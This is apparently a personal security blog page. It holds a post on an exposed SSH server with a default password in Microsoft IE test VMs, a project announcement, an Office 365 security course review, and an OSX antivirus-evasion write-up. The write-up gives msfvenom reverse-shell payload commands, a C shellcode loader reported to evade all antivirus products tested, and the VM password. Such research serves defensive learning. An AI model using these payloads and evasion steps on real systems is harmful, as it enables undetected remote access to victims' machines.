Recently I played with one of the Windows 7 32Bit IE Developer VMs (IE11.Win7.VirtualBox.zip) from here. I can remember two exploitation classes where these machines are being used.

I found an SSH server installed within the machine, it is not hidden or something, but on the other side no one I asked was aware about it.

As you can see the server is running on port 22:

The SSH server itself is running with its own user:

The SSH service is not blocked by local firewall rules:

Short reminder, the password is “Passw0rd!”. So better use these machines in NAT mode, change the password, adjust firewall etc..

Happy Hacking.

Posted by

Daniel

Posted on

May 16, 2019

Posted under

Uncategorized

Comments

Leave a comment

A new project: welearnsecurity.com

Here is my new project:

https://welearnsecurity.com/.

I love to write for career starters and also working with them. Since the content is too different from this blog I decided to split the content.

The blog will go from personal career experience to idealized career paths, hopefully articles or interviews from/with other successful security experts, recommendations for books and courses and so on.

Hopefully this project will become a valuable source for everyone looking into a career in infosec and motivated learners.

Posted by

Daniel

Posted on

March 21, 2019

Posted under

Uncategorized

Comments

Leave a comment

Antivirus Evasion on OSX

A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.

Scope
* build executables that are not recognized by Antivirus Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload with MSF
* developed with C & some assembly
* main focus is learning and automatiziation

Why?
Some high profile targets use OSX… so AV might be a thing.

Had a busy day today . But I always make time for #Twitter pic.twitter.com/YDQ63xy6bk

— Mahmoud Ahmadinejad (@Ahmadinejad1956) August 28, 2018

Dmitry Medvedev:

http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/

As do some security researchers 😉

Charlie Miller:

https://en.wikipedia.org/wiki/Charlie_Miller_(security_researcher)#/media/File:CharlieMillerHolmanSpeaker2015-20.jpg

Targeted Malware

Recon on South Korean NHN users using Macro based Document?

Hash: d565e1fa13543bffbc55424fd42fd499

1. Macro capable of running on both Windows and OSX.
2. Sends system info in HTTP POST request to:
hxxp://112.170.72.144:5000/send_data@ItsReallyNick @unpacker @JohnLaTwC pic.twitter.com/lQmdChXQ3q

— c0d3inj3cT (@c0d3inj3cT) August 29, 2018

… or like APT 28:

Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 –platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c

osx64_sc_binder.c

#include <string.h>
#include <sys/mman.h>
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
...
"\x15";

int main(int argc, char **argv)
{
  void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
  memcpy(ptr,buf,sizeof buf);
  void (*fp)() = (void (*)())ptr;
  fp();
}

And then some testing….

Comodo
… found nothing, only eicar.

Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
… no further testing.

Finally
As can be seen, not much efford is needed for evading AV software on MacOSX, The shellcode binder was enough for evading all tested platforms.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c

Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):

Maybe I will try to integrate it in AVET 2 some time.

Posted by

Daniel

Posted on

March 4, 2019

Posted under

Uncategorized

Comments

Leave a comment

Review EDX Course Security in Office 365 (Microsoft CLD245x)

Recently I took the course Security in Office 365 using the free Audit Access, the final exam and the Certificate are missing here.

Link: https://www.edx.org/course/security-in-office-365-1

The sections of the course are:

Threats and data breaches targeting your data
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence
Auditing, alerting and reporting in Office 365
Advanced Security Management in Office 365

After each section there is a quiz, as well as an final exam with 20 questions (missing in the free version). I’ll go through each section adding some notes.

Introduction to Security in Office 365

Threats and data breaches targeting your data

how threat actors gain access
kill chain
how the work and threat landscape changed
on-premises environment vs “gray area” (cloud etc.) in terms of controll and security
phishing
malware
spoofing
escalation of privilege
data exfiltration
data deletion including ransom ware
data spillage (“Data spillage occurs when protected data is transferred to a system that doesn’t provide the same level of protection as the source.”)
as well as password cracking
malicious insiders

Security solutions in Office 365

Exchange Online Protection (EOP)
Office 365 Advanced Threat Protection (Office 365 ATP)
Office 365 Threat Intelligence
Auditing and alerts
Advanced Security Management (ASM)
EOP (not End Of Protection 😉 but Exchange Online Protection)
Office 365 Threat Intelligence
Threat Dashboard
Auditing and alerts
Advanced Security Management (AMS)
Threat detection
Enhanced control
Discovery and insights

Introduction to Secure Score

Overview of Office 365 Secure Score
security related measurements
Office 365 Secure Score API
API & powershell
downstream data for other tools and SIEM etc.
The Secure Score dashboard
The Secure Score analyzer tab
Increasing your security posture
I liked some of the points:
- Enabling multi-factor authentication on all admin accounts
- Designating more than one global admin
- Enabling auditing across workloads
- Enabling mailbox auditing
- Having a weekly review of sign-ins after multiple failures
- Having a weekly review of sign-ins from unknown sources
- Having a weekly review of sign-ins from multiple geographies

Implementing and Managing Office 365 ATP

Introduction to Exchange Online Protection

The anti-malware pipeline in Office 365
Zero-hour auto purge
ZAP, detect spam or malware that was undetected by heuristics and delivery patterns
Phishing and spoofing protection
SFP, DKIM, DMARC
Spoof Intelligence
Give overview of spoofing attempts, allow spoofing for certain senders for certain addresses
Managing spoof intelligence

Overview of Office 365 Advanced Threat Protection

How ATP expands protection provided by EOP
Safe attachments
sandbox/detonation chamber 😀
Safe attachment policy options
Safe links
URL detonation -> mix of safe links and sage attachements
Safe links policy options

Managing Safe Attachments

Creating safe attachment policies in the Security and Compliance Center
Creating safe attachments policies using Windows PowerShell
Modifying an existing safe attachments policy in the Security and Compliance Center
Creating a transport rule to bypass safe attachments
Safe attachments end user experience

Managing Safe Links

Creating safe links policies by using the Security and Compliance Center
Creating safe links policies using Windows PowerShell
Modifying an existing safe links policy
Create a transport rule to bypass safe links
Safe links user experience in email
Safe links user experience in Office 2016

Monitoring and reports

Threat protection status report
ATP message disposition report
ATP file types report
Malware detections report
Top Malware report
Top Senders and Recipients report
Spoof Mail report
Spam Detections report
Sent and received email report
Security & Compliance Report Demonstration

Using Office 365 Threat Intelligence

Office 365 Threat Intelligence

“Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard.”

Microsoft Intelligent Security Graph
- Source: Windows, Office 365, Cloud Services, 3rd party
Threat dashboard
- reporting tool for C-level
Threat explorer
- analysts, admins

Using the Threat Detection dashboard

Threat detections in your tenant
Security and malware trends
Alerts
More insights
Threat Intelligence Demonstration

Using Threat Explorer

Viewing options in Threat explorer
Filtering capabilities in Threat Explorer
Drilling for details
Incident reports

Implementing auditing, insights, and alerts

Overview of auditing in the Security & Compliance Center

Auditing architecture in Office 365
Audited activities
Office 365 Management Activity API

Enabling mailbox auditing in Exchange Online

Mailbox actions logged by mailbox audit logging
Enabling mailbox auditing
Specifying owner actions to audit
Changing the age limit for entries in the mailbox audit log

Searching the audit log

Enabling auditing in your tenant
Granting permissions
Searching the audit log
Viewing the search results
Filtering the search results
Exporting the search results to a file
Searching the audit log by using Windows PowerShell
Using a SIEM application to access your auditing data

Enabling sharing auditing for SharePoint and OneDrive

The SharePoint sharing schema
The SharePoint Sharing model and sharing events
How to identify resources shared with external users

Managing insights and alerts in the Security & Compliance Center

Introduction to insights and alerts
Types of insights that are available
Types of alerts that are generated
Alerts features in the Security & Compliance Center
Alert policy settings
Default alert policies
Viewing alerts
Managing alerts

Advanced Security Management

Overview of Advanced Security Management

Lesson introduction
Anomaly detection policies
- Login authentication failures
- Administrator activity
- Inactive accounts
- Location
- Impossible travel
- Device and user agent
Activity policies
Anomaly detection and activity alerts
Policy templates
Productivity app discovery
App permissions

Implementing policies and alerts

Enabling and accessing Advanced Security Management
Creating anomaly detection policies
Creating activity policies
Reviewing and taking action on alerts
Investigating activities in the Activity log
Grouping IP addresses to simplify management

Implementing app discovery

Log file requirements
Supported vendors and their data attributes
Creating app discovery reports
Reviewing app discovery findings
Troubleshooting errors when log files are uploaded

Implementing app permissions

App permissions architecture
Managing app permissions
Approving or banning an app

Conclusion

Unfortunately I do not have access to an Office 365 environment for testing. So I was thankful that the course gives a broad insight of the posibilites of the security configurations of Office 365. Lots of the topics come withshort examples (like phishing, spoofing etc.) and a short video clip.

From my side more insight on the security mechanisms and more detail on Threat Intelligence would have been great. The course goes into logging and how to find strange behaviour, malware and threat intelligence. Which was really nice to see how much effort Microsoft put into securing their cloud products.

A lot of the questions in the module assessements questions are more about configuration the platform itself or how tabs are named, I felt a bit like in a MS exam long time ago. Large parts of the content is text and not videos, most courses are a bit different here.

The course gave a good overview and insights for understanding Security in Office 365 for me, that’s what I was looking for.

Links

https://go.microsoft.com/fwlink/?linkid=858584

https://go.microsoft.com/fwlink/?linkid=858585

https://products.office.com/en-us/business/office-365-enterprise-e5-business-software

https://go.microsoft.com/fwlink/?linkid=858587

https://docs.microsoft.com/en-us/cloud-app-security/what-is-cloud-app-security

https://www.edx.org/course/managing-microsoft-exchange-online-microsoft-cld222x-2

https://go.microsoft.com/fwlink/?linkid=859414

https://go.microsoft.com/fwlink/?linkid=859408

https://go.microsoft.com/fwlink/?linkid=859410

https://go.microsoft.com/fwlink/?linkid=859412

https://go.microsoft.com/fwlink/?linkid=859660

https://go.microsoft.com/fwlink/?linkid=859661

https://docs.microsoft.com/en-us/exchange/understanding-management-role-groups-exchange-2013-help

https://go.microsoft.com/fwlink/?linkid=859671

https://docs.microsoft.com/en-us/office365/securitycompliance/set-up-atp-safe-links-policies

https://go.microsoft.com/fwlink/?linkid=859799

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-integrating-applications

	Review Cybrary Advan… on Review Udemy “Certified…
	Review Udemy “… on The first 15 days of a passwor…
	Review Udemy “… on Review Udemy “Certified…
	govolution on Review Udemy “Certified…
	Marcel on Review Udemy “Certified…